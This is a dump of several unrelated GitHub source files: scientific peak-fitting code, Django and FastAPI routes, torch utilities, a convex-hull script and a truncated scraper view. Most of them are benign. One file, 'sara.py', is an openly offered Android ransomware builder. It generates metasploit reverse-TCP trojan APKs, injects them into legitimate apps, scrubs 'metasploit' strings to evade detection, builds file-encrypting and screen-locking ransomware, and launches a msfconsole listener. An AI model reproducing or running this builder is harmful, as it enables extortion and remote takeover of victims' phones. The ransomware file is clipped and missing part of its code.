numpy.ndarray, shape (N,N,N)\n subvolume of intensities\n pvol : numpy.ndarray, shape (N,N,N)\n subvolume of phases in degrees\n isigma : float\n threshold, pixel selected if its intensity > mean + isigma * std dev\n psigma : float\n threshold in degrees, pixels discarded while phase std dev exceeds this value\n weighted : bool\n whether to intensity-weight the mean phase calculation\n tm_boxsize : int or tuple of (int,int,int)\n dimensions of central region of subvolume to consider for peak-fitting.\n The mask will default to its previously-used value if set before.\n \n Returns\n -------\n ival : float\n peak intensity, or 0 if no peak was found\n pval : float\n peak phase in degrees, or 0 if no peak was found\n mask : numpy.ndarray, shape (N,N,N)\n subvolume in which 1 indicates that voxel was retained during peak fitting\n \"\"\"\n # generate a tight mask as requested\n if tm_boxsize is not None:\n self.tightmask = self.generate_tightmask(tm_boxsize)\n\n # identify high intensity pixels\n ithreshold = ivol.mean() + isigma*ivol.std()\n imask = np.zeros_like(ivol)\n imask[np.where((ivol>ithreshold) & (self.tightmask==1))] = 1\n indices = np.array(np.where(imask==1))\n \n # condition of no high intensity pixels in valid region\n if indices.size == 0:\n return 0, 0, np.zeros(self.radii.shape)\n\n # find set of contiguous pixels that are nearest to the center\n struct = scipy.ndimage.generate_binary_structure(3, 1)\n labeled, ncomponents = scipy.ndimage.measurements.label(imask, struct)\n d = {nc:np.mean(self.radii[labeled==nc]) for nc in range(1,ncomponents+1)}\n label = min(d, key=d.get)\n\n # select relevant intensity and phase values\n ivals = ivol[np.where(labeled==label)]\n pvals = pvol[np.where(labeled==label)]\n indices = np.array([np.where(labeled==label)])\n\n # discard pixels until psigma threshold is met\n if phases_utils.std_phases(pvals, weights=ivals) > psigma:\n sort_idx = np.argsort(ivals)\n ivals, pvals = ivals[sort_idx], pvals[sort_idx]\n\n for ni in range(ivals.shape[0]):\n if phases_utils.std_phases(pvals[ni:], weights=ivals[ni:]) < psigma:\n break\n ivals, pvals = ivals[ni:], pvals[ni:]\n indices = indices.T[sort_idx][ni:]\n else:\n indices = indices.T\n \n # compute peak intensity and phase\n ival = np.mean(ivals)\n if weighted:\n pval = phases_utils.average_phases(pvals, weights=ivals)\n else:\n pval = phases_utils.average_phases(pvals)\n print(\"Phases:\", pvals)\n\n # generate a mask to spatially track retained pixels\n mask = np.zeros(self.radii.shape)\n mask[indices[:,0], indices[:,1], indices[:,2]] = 1\n \n return ival, pval, mask\n \n def fit_all_peaks(self, isigma, psigma, weighted=True, tm_boxsize=None):\n \"\"\"\n Fit the Bragg peak intensity and phase in each subvolume.\n \n Parameters\n ----------\n isigma : float\n threshold, pixel selected if its intensity > mean + isigma * std dev\n psigma : float\n threshold in degrees, pixels discarded while phase std dev exceeds this value\n weighted : bool\n whether to intensity-weight the mean phase calculation\n tm_boxsize : int or tuple of (int,int,int)\n dimensions of central region of subvolume to consider for peak-fitting\n \n Returns\n -------\n hklIp : numpy.ndarray, shape (N, 5)\n data array of [h,k,l,intensity,phase]; phase is in degrees and from peak-fitting\n \"\"\"\n # set up storage array and dictionaries\n hklIp = np.zeros((len(self.ivols.keys()), 5))\n self.masks = dict()\n \n # generate a tight mask as requested\n if tm_boxsize is not None:\n self.tightmask = self.generate_tightmask(tm_boxsize)\n \n # fit all peaks\n for i,miller in enumerate(self.ivols.keys()):\n print(f\"Fitting reflection {miller}\")\n peakI, peakp, self.masks[miller] = self.fit_peak(self.ivols[miller],\n self.pvols[miller],\n isigma,\n psigma,\n weighted=weighted)\n if peakI == 0:\n print(f\"Warning: no peak found for reflection {miller}\")\n hklIp[i] = np.array(miller + (peakI, peakp))\n \n # remove any peaks that couldn't be fit\n hklIp = hklIp[hklIp[:,3]!=0]\n \n return hklIp\n \n def visualize_peak(self, miller, sl=None, use_mask=True):\n \"\"\"\n Generate a figure that visualizes cross-sections through the peak's intensity\n and phase values.\n \n Parameters\n ----------\n miller : tuple, shape 3, optional \n Miller indices for reflection, if provided use as plot title\n sl : int, optional\n index for slicing through subvolumes; if None, show central slices\n \"\"\"\n mvol = None\n if use_mask:\n mvol = self.masks[miller]\n \n visualize.visualize_peak(self.ivols[miller],\n self.pvols[miller],\n mvol=mvol, \n miller=miller,\n sl=sl)\n return \n","repo_name":"apeck12/tomoxtal","sub_path":"tomoxtal/pipeline/fit_peaks.py","file_name":"fit_peaks.py","file_ext":"py","file_size_in_byte":11759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18885141215","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('updatePage', views.updatePage, name='updatePage'),\n path('create', views.createProfilePage, name='create'),\n path('profile', views.viewProfile, name='profile'),\n path('gettingInputFromCreate', views.gettingInputFromCreate, name='gettingInputFromCreate'),\n path('deletePerson', views.deletePerson, name='deletePerson'),\n path('preferencePerson', views.preferencePerson, name='preferencePerson'),\n path('updateProfile', views.updateProfile, name='updateProfile'),\n path('suggestions', views.suggestions, name='suggestions'),\n path('login', views.login, name='login'),\n path('logout', views.logout, name='logout'),\n path('allusers', views.allusers, name='allusers'),\n path('login_action', views.login_action, name='login_action')\n\n]\n","repo_name":"freddyh23/cs411projectLLL","sub_path":"cs411finalproject/CS411Project/calc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23796293108","text":"from typing import Annotated\n\nfrom fastapi import Depends, HTTPException\nfrom jose import JWTError, jwt\nfrom starlette import status\n\nfrom app.auth.auth import ALGORITHM, SECRET_KEY, get_user, oauth2_scheme\nfrom app.models.models import TokenData\n\n\nasync def get_current_user(token: Annotated[str, Depends(oauth2_scheme)]):\n \"\"\"\n Authentication dependency to authentication and fetch the current logged in user\n\n :param token:\n :return:\n \"\"\"\n credentials_exception = HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Could not validate credentials\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n try:\n payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])\n username: str = payload.get(\"sub\")\n if username is None:\n raise credentials_exception\n token_data = TokenData(username=username)\n except JWTError:\n raise credentials_exception\n user = get_user(username=token_data.username)\n if user is None:\n raise credentials_exception\n return user\n","repo_name":"shivamg7/AspireLoans","sub_path":"app/auth/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39563545057","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# style and colors\ni = '\\033[3m'\nu = '\\033[4m'\nw = '\\033[0m'\nr = '\\033[1;91m'\ng = '\\033[1;92m'\ny = '\\033[1;33m'\nb = '\\033[1;94m'\nd = '\\033[90m'\n# global variable\nhide = '> /dev/null 2>&1'\nsara = f'{d}<{b}sara{d}>{w}'\nuser = f'{d}<{g}user{d}>{w}'\n# import module\ntry:\n import os\n import re\n import sys\n import time\n import json\n import random\n import datetime\n import requests\n import fileinput\n from PIL import Image\nexcept (ModuleNotFoundError):\n exit(f'''\n{sara} : It seems there is a module that you have not installed\n run this command \\'{g}pip install -r requirements.txt{w}\\'\n to install it.\n ''')\n# banner (sara-v3.0)\ndef banner():\n os.system(\"cls\" if os.name == \"nt\" else \"clear\")\n print(w+d+\" ,, ,,\")\n print(w+d+\" ((((( )))))\")\n print(w+d+\" (((((( ))))))\")\n print(w+d+\" (((((( ))))))\")\n print(w+d+\" (((((\"+w+b+\",r@@@@@@@@@@e,\"+w+d+\")))))\")\n print(w+d+\" (((\"+w+b+\"@@@@@@@@@@@@@@@@\"+w+d+\")))\")\n print(w+b+\" \\@@/\"+r+\",:::,\"+w+b+\"\\/\"+r+\",:::,\"+w+b+\"\\@@/\")\n print(w+b+\" /@@@|\"+r+\":::::\"+w+b+\"||\"+r+\":::::\"+w+b+\"|@@@\\\\\")\n print(w+b+\" / @@@\\\\\"+r+\"':::'\"+w+b+\"/\\\\\"+r+\"':::'\"+w+b+\"/@@@ \\\\ \"+w+\"'\"+r+\"Beware of Ransomware\"+b+w+\"'\")\n print(w+b+\" / /@@@@@@@//\\\\\\@@@@@@@\\ \\\\ \"+d+\"version 3.0\"+w)\n print(w+b+\" ( / '@@@@@====@@@@@' \\ )\")\n print(w+b+\" \\( / \\ )/\")\n print(w+b+\" \\ ( ) /\")\n print(w+b+\" \\ /\"+w)\n# print letter by letter\ndef prints(text):\n for line in text:\n print(line, end='', flush=True)\n time.sleep(0.008)\n print('')\n# print truncate strings\ndef truncates(text, maxx=20):\n if len(text) > maxx: return text[:maxx - 3] + \"...\"\n else: return text\n# search and replace specific string\ndef replace_string(oldstr, newstr, file):\n text = f'{sara} : add \\'{d}{truncates(newstr)}{w}\\' on \\'{d}{os.path.basename(file)}{w}\\' ... '\n print(text + f'{y}wait{w}', end='\\r')\n os.system(f'sed -i \\'s#{oldstr}#{newstr}#g\\' {file}')\n time.sleep(0.05)\n if not int(os.popen(f'grep -rc \\'{newstr}\\' {file}', 'r').readline().strip()) > 0: exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n return newstr\n# search and replace specific string 2\ndef replace_strings(oldstr, newstr, file):\n replaces = {oldstr:newstr}\n for line in fileinput.input(file, inplace=True):\n for search in replaces:\n replaced = replaces[search]\n line = line.replace(search,replaced)\n print(line, end=\"\")\n# add new icon path (for msfvenom apk)\ndef add_new_icon(icon, path):\n text = f'{sara} : add \\'{d}ic_launcher.png{w}\\' into \\'{d}mipmap-hdpi-v4{w}\\' ... '\n file = f'{path}/res/mipmap-hdpi-v4/ic_launcher.png'\n print(text + f'{y}wait{w}', end='\\r')\n os.system(f'mkdir -p {path}/res/mipmap-hdpi-v4/')\n os.system(f'cp -r {icon} {file} {hide}')\n if not os.path.isfile(file): exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n text = f'{sara} : add \\'{d}ic_launcher.png{w}\\' into \\'{d}AndroidManifest.xml{w}\\' ... '\n print(text + f'{y}wait{w}', end='\\r')\n os.system(f'sed -i \\'s#app_name', f'\"app_name\">{name}', f'{path}/res/values/strings.xml')\n replace_string('app_name', name, f'{path}/smali/com/termuxhackersid/services/EncryptionService.smali')\n replace_string('app_name', name, f'{path}/smali/com/termuxhackersid/services/DecryptionService.smali')\n replace_string('app_desc', desc, f'{path}/smali/com/termuxhackersid/services/EncryptionService.smali')\n replace_string('app_desc', desc, f'{path}/smali/com/termuxhackersid/ui/MainActivity$a.smali')\n replace_string('app_desc', desc, f'{path}/smali/com/termuxhackersid/ui/MainActivity.smali')\n text = f'{sara} : add \\'{d}{os.path.basename(icon)}{w}\\' into \\'{d}ic_launcher{w}\\' ... '\n print(text + f'{y}wait{w}', end='\\r')\n for line in os.popen(f'find -O3 -L {path} -name \\'ic_launcher.png\\'', 'r').read().splitlines():\n if os.path.isfile(line):\n with Image.open(line) as f:\n X, Z = f.size\n size = str(X) + 'x' + str(Z)\n logo = 'lock-' + os.path.basename(icon)\n os.system(f'cp -R {icon} {logo}')\n os.system(f'mogrify -resize {size} {logo};cp -R {logo} {line};rm -rf {logo}')\n else: exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n random_digit = str(random.randint(1,9))\n random_version = f'{random_digit}.0'\n rename_version_code(random_digit, path)\n rename_version_name(f'{random_version} by @{name.lower().replace(\" \",\"\")}', path)\n file = recompile(path)\n apps = uber_apk_signer(file)\n upload_file(apps)\n return apps\n\n# generate custom screen locker ransomware (passprhase)\ndef genertare_screen_locker(name, head, desc, keys, icon):\n base = 'data/tmp/lockscreen.apk'\n path = name.lower().replace(' ', '')\n file = path + '.apk'\n os.system(f'cp -f {base} {file}')\n decompile(file)\n replace_string('\"app_name\">app_name', f'\"app_name\">{name}', f'{path}/res/values/strings.xml')\n replace_string('app_head', head, f'{path}/res/values/strings.xml')\n replace_string('app_desc', desc, f'{path}/res/values/strings.xml')\n print(f'{sara} : add \\'{d}{keys}{w}\\' as passprhase ... {y}wait{w}', end='\\r')\n replace_strings('app_keys', keys, f'{path}/smali/com/termuxhackers/id/MyService$100000000.smali')\n print(f'{sara} : add \\'{d}{keys}{w}\\' as \\'{d}passprhase{w}\\' ... {g}done{w}')\n text = f'{sara} : add \\'{d}{os.path.basename(icon)}{w}\\' into \\'{d}ic_launcher{w}\\' ... '\n print(text + f'{y}wait{w}', end='\\r')\n for line in os.popen(f'find -O3 -L {path} -name \\'ic_launcher.png\\'', 'r').read().splitlines():\n if os.path.isfile(line):\n with Image.open(line) as f:\n X, Z = f.size\n size = str(X) + 'x' + str(Z)\n logo = 'lock-' + os.path.basename(icon)\n os.system(f'cp -R {icon} {logo}')\n os.system(f'mogrify -resize {size} {logo};cp -R {logo} {line};rm -rf {logo}')\n else: exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n random_digit = str(random.randint(1,9))\n random_version = f'{random_digit}.0'\n rename_version_code(random_digit, path)\n rename_version_name(f'{random_version} by @{name.lower().replace(\" \",\"\")}', path)\n file = recompile(path)\n apps = uber_apk_signer(file)\n upload_file(apps)\n return apps\n\n# listening trojan with msfconsole (metasploit)\ndef start_trojan_listener(host, port):\n prints(f'''\n{sara} : redirecting to the metasploit console\n payload = \\'{r}android/meterpreter/reverse_tcp{w}\\'\n with host = \\'{y}{host}{w}\\' and port = \\'{y}{port}{w}\\'\n listening as job (0).\n ''')\n os.system(f'msfconsole -q -x \"use payload/android/meterpreter/reverse_tcp;set lhost {host};set lport {port};exploit -j\"')\n# signing apk file with uber-apk-signer (JAR)\ndef uber_apk_signer(file):\n text = f'{sara} : signing \\'{d}{file}{w}\\' using uber-apk-signer ... '\n print(text + f'{y}wait{w}', end='\\r')\n sign = os.path.basename(file).replace('.apk', '')\n os.system(f'java -jar data/bin/ubersigner.jar -a {file} --ks data/key/debug.jks --ksAlias debugging --ksPass debugging --ksKeyPass debugging {hide}')\n os.system(f'rm -rf {file} *.idsig {hide}')\n os.system(f'cp -rf {sign}-aligned-signed.apk {sign}.apk {hide}; rm -rf {sign}-aligned-signed.apk {hide}')\n if not os.path.isfile(f'{sign}.apk'): exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n return sign + '.apk'\n# decompiling apk file with apktool\ndef decompile(file):\n text = f'{sara} : decompile \\'{d}{file}{w}\\' using apktool ... '\n path = os.path.basename(file).replace('.apk', '')\n print(text + f'{y}wait{w}', end='\\r')\n os.system(f'apktool d {file} {hide}')\n if not os.path.isdir(path): exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n os.remove(file)\n return path\n# recompiling apk path with apktool (with aapt2 as second options)\ndef recompile(path):\n text = f'{sara} : recompile \\'{d}{path}{w}\\' using apktool ... '\n file = path + '.apk'\n print(text + f'{y}wait{w}', end='\\r')\n os.system(f'apktool b {path} -o {file} {hide}')\n if not os.path.isfile(file):\n print(text + f'{y}wait{w} ({d}aapt2{w})', end='\\r')\n os.system(f'apktool b {path} -o {file} --use-aapt2 {hide}')\n time.sleep(0.5)\n if not os.path.isfile(file): exit(text + f'{r}fail{w}')\n print(text + f'{g}done{w}')\n os.system(f'rm -rf {path} {hide}')\n return file\n# SARA V3.0\nclass __sara__:\n\n def __init__(self):\n self.user = str(os.popen('whoami', 'r').readline().strip())\n self.ipv4 = '127.0.0.1'\n self.data = 'data'\n \n def custom_trojan(self):\n banner()\n prints(f'''\n{sara} : you can fill or leave blank for using\n default configuration. the default configuration is\n host = \\'{y}{self.ipv4}{w}\\' port = \\'{y}4444{w}\\' name = \\'{r}trojan.apk{w}\\'\n and icon = \\'{r}data/tmp/icon.png{w}\\'.\n\n custom trojan apk (client)\n ''')\n name = str(input(f' set app name: '))\n if not name: name = 'trojan'\n icon = str(input(f' set app icon: '))\n if not os.path.isfile(icon): icon = 'data/tmp/icon.png'\n host = str(input(f' set app host: '))\n if not host: host = self.ipv4\n port = str(input(f' set app port: '))\n if not port: port = '4444'\n prints(f'''\n{sara} : well this process takes a few minutes,\n please be patient until the process is complete \n ''')\n file = generate_trojan(host, port, name.replace(' ', '').replace('.apk', '').lower())\n path = decompile(file)\n replace_string('MainActivity', name, f'{path}/res/values/strings.xml')\n add_new_icon(icon, path)\n for line in os.popen(f'grep -rc \\'metasploit\\' {path}', 'r').read().splitlines():\n line = line.split(':')\n if int(line[1]) > 0: replace_string('metasploit', path, line[0])\n rename_dir(f'{path}/smali/com/metasploit/', f'{path}/smali/com/{path}/')\n random_digit = str(random.randint(1,9))\n random_version = f'{random_digit}.0'\n rename_version_code(random_digit, path)\n rename_version_name(f'{random_version} by @{path}', path)\n apps = recompile(path)\n apps = uber_apk_signer(apps)\n upload_file(apps)\n if not os.path.isfile(apps): exit(f'\\n{sara} : sorry, failed to build \\'{d}{apps}{w}\\' :( \\n')\n prints(f'''\n{sara} : your trojan apps successfully created\n the application is saved as \\'{g}{apps}{w}\\'\n \n do you want to start listener ?\n \n (1) yes, i want to set new host and port\n (2) yes, i want to use previous host and port\n (3) no thanks, i want to exit\n ''')\n ask = str(input(f'{user} : '))\n if ask in ('1' , '01'):\n host = str(input(f'{user} : set host > '))\n if not host: host = self.ipv4\n port = str(input(f'{user} : set port > '))\n if not port: port = '4444'\n elif ask in ('2', '02'): pass\n else: exit(f'\\n{sara} : process completed successfully ...\\n')\n start_trojan_listener(host, port)\n\n def infect_trojan(self):\n banner()\n prints(f'''\n{sara} : you can fill or leave blank for using default config\n the default configuration is apps = \\'{r}REQUIRED{w}\\'\n host = \\'{y}{self.ipv4}{w}\\' and port = \\'{y}4444{w}\\'.\n\n infect trojan apk (client)\n ''')\n orig = str(input(f' set ori apps: '))\n if not os.path.isfile(orig): exit(f'{sara} : file \\'{d}{orig}{w}\\' doesn\\'t exist !')\n host = str(input(f' set app host: '))\n if not host: host = self.ipv4\n port = str(input(f' set app port: '))\n if not port: port = '4444'\n prints(f'''\n{sara} : well this process takes a few minutes,\n please be patient until the process is complete \n ''')\n file = generate_infected_trojan(host, port, orig)\n upload_file(file)\n if not os.path.isfile(file): exit(f'\\n{sara} : sorry, failed to build \\'{d}{file}{w}\\' :( \\n')\n prints(f'''\n{sara} : your trojan apps successfully created\n the application is saved as \\'{g}{file}{w}\\'\n \n do you want to start listener ?\n \n (1) yes, i want to set new host and port\n (2) yes, i want to use previous host and port\n (3) no thanks, i want to exit\n ''')\n ask = str(input(f'{user} : '))\n if ask in ('1' , '01'):\n host = str(input(f'{user} : set host > '))\n if not host: host = self.ipv4\n port = str(input(f'{user} : set port > '))\n if not port: port = '4444'\n elif ask in ('2', '02'): pass\n else: exit(f'\\n{sara} : process completed successfully ...\\n')\n start_trojan_listener(host, port)\n \n def custom_file_locker(self):\n banner()\n prints(f'''\n{sara} : you can fill or leave blank for using default config\n the default configuration is name = \\'{r}File Locker{w}\\'\n desc = \\'{r}Your File Have Been Encrypted{w}\\'\n and icon = \\'{y}data/tmp/icon.png{w}\\'.\n\n custom file locker apk (encrypter)\n ''')\n name = str(input(f' set app name: '))\n if not name: name = 'File Locker'\n desc = str(input(f' set app desc: '))\n if not desc: desc = 'Your File Have Been Encrypted'\n icon = str(input(f' set app icon: '))\n if not os.path.isfile(icon): icon = 'data/tmp/icon.png'\n prints(f'''\n{sara} : well this process takes a few minutes,\n please be patient until the process is complete \n ''')\n file = genertare_file_locker(name, desc, icon)\n os.system(f'cp -r data/tmp/decrypter.apk .')\n if not os.path.isfile(file): exit(f'\\n{sara} : sorry, failed to build \\'{d}{file}{w}\\' :( \\n')\n prints(f'''\n{sara} : your file locker apps successfully created\n the encrypter is saved as \\'{g}{file}{w}\\'\n the decrypter is saved as \\'{g}decrypter.apk{w}\\'\n ''')\n \n def custom_screen_locker(self):\n banner()\n prints(f'''\n{sara} : you can fill or leave blank for using default config\n the default configuration is name = \\'{r}Screen Locker{w}\\'\n head = \\'{r}Your Phone Is Locked{w}\\'\n desc = \\'{r}locked by sara@termuxhackers-id{w}\\'\n icon = \\'{y}data/tmp/icon.png{w}\\' and keys = \\'{y}s3cr3t{w}\\'\n\n custom lock screen apk (passprhase)\n ''')\n name = str(input(f' set app name: '))\n if not name: name = 'Screen Locker'\n head = str(input(f' set app head: '))\n if not head: head = 'Your Phone Is Locked'\n desc = str(input(f' set app desc: '))\n if not desc: desc = 'locked by sara@termuxhackers-id'\n icon = str(input(f' set app icon: '))\n if not os.path.isfile(icon): icon = 'data/tmp/icon.png'\n keys = str(input(f' set app keys: '))\n if not keys: keys = 's3cr3t'\n prints(f'''\n{sara} : well this process takes a few minutes,\n please be patient until the process is complete \n ''')\n file = genertare_screen_locker(name, head, desc, keys, icon)\n if not os.path.isfile(file): exit(f'\\n{sara} : sorry, failed to build \\'{d}{file}{w}\\' :( \\n')\n prints(f'''\n{sara} : your screen locker apps successfully created\n the application is saved as \\'{g}{file}{w}\\'\n the secret key (passprhase) \\'{g}{keys}{w}\\'\n ''')\n\n def menu(self):\n banner()\n prints(f'''\n{sara} : Hi user, welcome to @{y}SARA{w} :)\n\n{sara} : sara is a simple android ransomware attack\n this tool is made for education purpose only\n the author is not responsible for any loses\n or damage caused by this programs.\n\n{sara} : can i help you ?\n \n (1) build trojan ransomware ({b}metasploit{w})\n (2) build locker ransomware ({b}filelocker{w})\n (3) build screen ransomware ({b}screenlock{w})\n (4) exit!\n ''')\n while True:\n main = str(input(f'{user} : '))\n if main in ('1', '01'):\n banner()\n prints(f'''\n{sara} : ok, you can choose one ...\n\n (1) build custom trojan ({b}metasploit{w})\n (2) build trojan and infect ({b}metasploit{w})\n (3) back to previous\n ''')\n while True:\n main_menu = str(input(f'{user} : '))\n if main_menu in ('1', '01'): self.custom_trojan() \n elif main_menu in ('2', '02'): self.infect_trojan()\n elif main_menu in ('3', '03', 'back'): pass\n else: print(f'{sara} : sorry, no command found for: {main_menu}'); continue\n break\n elif main in ('2', '02'): self.custom_file_locker()\n elif main in ('3', '03'): self.custom_screen_locker()\n elif main in ('4', '04', 'exit'): exit(1)\n else: print(f'{sara} : sorry, no command found for: {main}'); continue\n break\n input(f'{sara} : press enter for back to \\'{g}main menu{w}\\' (enter) ')\n self.menu()\n\nif __name__ == '__main__':\n try: __sara__().menu()\n except KeyboardInterrupt: exit(1)\n","repo_name":"termuxhackers-id/SARA","sub_path":"sara.py","file_name":"sara.py","file_ext":"py","file_size_in_byte":21515,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"61"} +{"seq_id":"44490691627","text":"from typing import Sequence, Iterator, Dict\n\nimport torch\nimport numpy as np\n\n\ndef validate_1d_like(x):\n if len(x.shape) > 1:\n extra_shape = list(x.shape[1:])\n if extra_shape == ([1] * len(extra_shape)):\n for _ in range(len(extra_shape)):\n x = x.squeeze(-1)\n if len(x.shape) != 1:\n raise ValueError(f\"Expected 1D tensor; instead got `{x.shape}`\")\n return x\n\n\ndef log_chol_to_chol(log_diag: torch.Tensor, off_diag: torch.Tensor) -> torch.Tensor:\n assert log_diag.shape[:-1] == off_diag.shape[:-1]\n\n rank = log_diag.shape[-1]\n L1 = torch.diag_embed(torch.exp(log_diag))\n\n L2 = torch.zeros_like(L1)\n mask = torch.tril_indices(rank, rank, offset=-1)\n L2[mask[0], mask[1]] = off_diag\n return L1 + L2\n\n\ndef chunk_grouped_data(*tensors, group_ids: Sequence):\n \"\"\"\n XXX\n :param tensors:\n :param group_ids:\n :return:\n \"\"\"\n group_ids = validate_1d_like(np.asanyarray(group_ids))\n\n # torch.split requires we put groups into contiguous chunks:\n sort_idx = np.argsort(group_ids)\n group_ids = group_ids[sort_idx]\n tensors = [x[sort_idx] for x in tensors]\n\n # much faster approach to chunking than something like `[X[gid==group_ids] for gid in np.unique(group_ids)]`:\n _, counts_per_group = np.unique(group_ids, return_counts=True)\n counts_per_group = counts_per_group.tolist()\n\n group_data = []\n for chunk_tensors in zip(*(torch.split(x, counts_per_group) for x in tensors)):\n group_data.append(chunk_tensors)\n return group_data\n\n\ndef validate_tensors(*args: torch.Tensor) -> Iterator[torch.Tensor]:\n for arg in args:\n if torch.isnan(arg).any():\n raise ValueError(\"`nans` in tensor\")\n if torch.isinf(arg).any():\n raise ValueError(\"`infs` in tensor\")\n yield arg\n\n\ndef validate_group_ids(group_ids: Sequence, num_grouping_factors: int) -> np.ndarray:\n group_ids = np.asanyarray(group_ids)\n if num_grouping_factors > 1:\n if len(group_ids.shape) != 2 or group_ids.shape[1] != num_grouping_factors:\n raise ValueError(\n f\"There are {num_grouping_factors} grouping-factors, so `group_ids` should be 2d with 2nd \"\n f\"dimension of this extent.\"\n )\n else:\n group_ids = validate_1d_like(group_ids)[:, None]\n return group_ids\n\n\ndef get_yhat_r(design: dict,\n X: torch.Tensor,\n group_ids: np.ndarray,\n res_per_gf: dict) -> torch.Tensor:\n \"\"\"\n Get yhat for random-effects.\n\n :param design: A dictionary with keys as grouping factors and values as indices in the model-matrix.\n :param X: The model-matrix.\n :param group_ids: The group-ids.\n :param res_per_gf: A dictionary with keys as grouping factors and values as random-effect coefficients.\n :return: A tensor with rows corresponding to the model-matrix and columns corresponding to the grouping-factors.\n \"\"\"\n yhat_r = torch.empty(*group_ids.shape)\n for i, (gf, col_idx) in enumerate(design.items()):\n Xr = torch.cat([torch.ones((len(X), 1)), X[:, col_idx]], 1)\n _, group_idx = np.unique(group_ids[:, i], return_inverse=True)\n betas_broad = res_per_gf[gf][group_idx]\n yhat_r[:, i] = (Xr * betas_broad).sum(1)\n return yhat_r\n\n\ndef get_to_kwargs(x) -> dict:\n if isinstance(x, torch.nn.Module):\n return get_to_kwargs(next(iter(x.parameters())))\n return {'dtype': x.dtype, 'device': x.device}\n\n\ndef pad_res_per_gf(res_per_gf: Dict[str, torch.Tensor],\n group_ids_predict: Sequence,\n group_ids_solve: Sequence,\n fill_value: float,\n verbose: bool = False) -> Dict[str, torch.Tensor]:\n # there is no requirement that all groups in `group_ids` are present in `group_data`, or vice versa, so\n # need to map the re_solve output\n res_per_gf_padded = {}\n for gf_i, gf in enumerate(res_per_gf):\n ugroups_target = {gid: i for i, gid in enumerate(np.unique(group_ids_predict[:, gf_i]))}\n ugroups_solve = {gid: i for i, gid in enumerate(np.unique(group_ids_solve[:, gf_i]))}\n set1 = set(ugroups_solve) - set(ugroups_target)\n if set1 and verbose:\n print(f\"there are {len(set1):,} groups in solve data but not in predict data\")\n set2 = set(ugroups_target) - set(ugroups_solve)\n if set2 and verbose:\n print(f\"there are {len(set2):,} groups in predict data but not in solve data\")\n\n res_per_gf_padded[gf] = torch.full(\n (len(ugroups_target), res_per_gf[gf].shape[-1]),\n fill_value=fill_value,\n device=res_per_gf[gf].device,\n dtype=res_per_gf[gf].dtype\n )\n for gid_target, idx_target in ugroups_target.items():\n idx_solve = ugroups_solve.get(gid_target)\n if idx_solve is None:\n continue\n res_per_gf_padded[gf][idx_target] = res_per_gf[gf][idx_solve]\n return res_per_gf_padded\n","repo_name":"strongio/torch-hlm","sub_path":"torch_hlm/mixed_effects_module/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70876681153","text":"from math import sqrt\n\ndef distance(a, b):\n # sqrt ( (Xa - Xb)^2 + (Ya - Yb)^2 )\n return sqrt((a[0] - b[0]) * (a[0] - b[0]) + (a[1] - b[1]) * (a[1] - b[1]))\n\n\ndef viraj_dreapta(q): # functie care calculeaza daca ultimele 3 puncte dintr-o lista fac un viraj la dreapta sau sunt coliniare\n # 1 1 1\n # q[-3][0] q[-2][0] q[-1][0]\n # q[-3][1] q[-2][1] q[-1][1]\n det = q[-2][0] * q[-1][1] + q[-3][0] * q[-2][1] + q[-1][0] * q[-3][1] - q[-2][0] * q[-3][1] - q[-1][0] * q[-2][1] - q[-3][0] * q[-1][1]\n if det < 0 or det == 0:\n return True\n else:\n return False\n\n\ndef convex_hull(arr):\n conv = []\n for point in arr:\n conv.append(point)\n\n while len(conv) >= 3 and viraj_dreapta(conv):\n conv.pop(-2)\n\n return conv\n\npoints = int(input())\n\narr_points = []\n\nfor i in range(points):\n x, y = input().split()\n arr_points.append((int(x),int(y)))\n\narr_points = sorted(arr_points, key=lambda b: (b[0], b[1]))\n\nunder = convex_hull(arr_points)\narr_points.reverse()\nupper = convex_hull(arr_points)\n\nconvHull = under + upper[1:-1]\n\nsums = [0 for i in range(points)]\n\nwhile len(convHull) < points:\n pts = {}\n\n for point in arr_points:\n if point not in convHull:\n min = 9999\n length = len(convHull)\n for i in range(length):\n cost_ipj = distance(convHull[i], point) + distance(point, convHull[(i + 1) % length] )\n cost_ij = distance(convHull[i], convHull[(i + 1) % length] )\n sum = cost_ipj - cost_ij\n if sum < min:\n pts[point] = (sum, i, cost_ipj / cost_ij)\n min = sum\n\n min = 9999\n ind = ()\n for pct in pts.keys():\n division = pts[pct][2]\n if division < min:\n min = division\n ind = pct\n\n convHull.insert(pts[ind][1] + 1, ind)\n\nprint(convHull)","repo_name":"ccazacu13/Advanced-algorithms-","sub_path":"Lab1/traveling_salesman.py","file_name":"traveling_salesman.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41788524885","text":"import json\nimport time\n\nimport boto.sqs\nfrom boto.sqs.message import RawMessage\nfrom boto.s3.connection import S3Connection\n\nfrom dateutil.parser import parse as parse_date\nfrom datetime import datetime, timedelta\n\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom .forms import ImmediateForm\n\nSERVER_NAME = 'test_server'\n\nQUEUE_INPUT = 'scraper_walmart-test_in'\nQUEUE_OUTPUT = 'immediate_output'\n\nTIMEOUT_LITE = 60 * 5 # wait 5 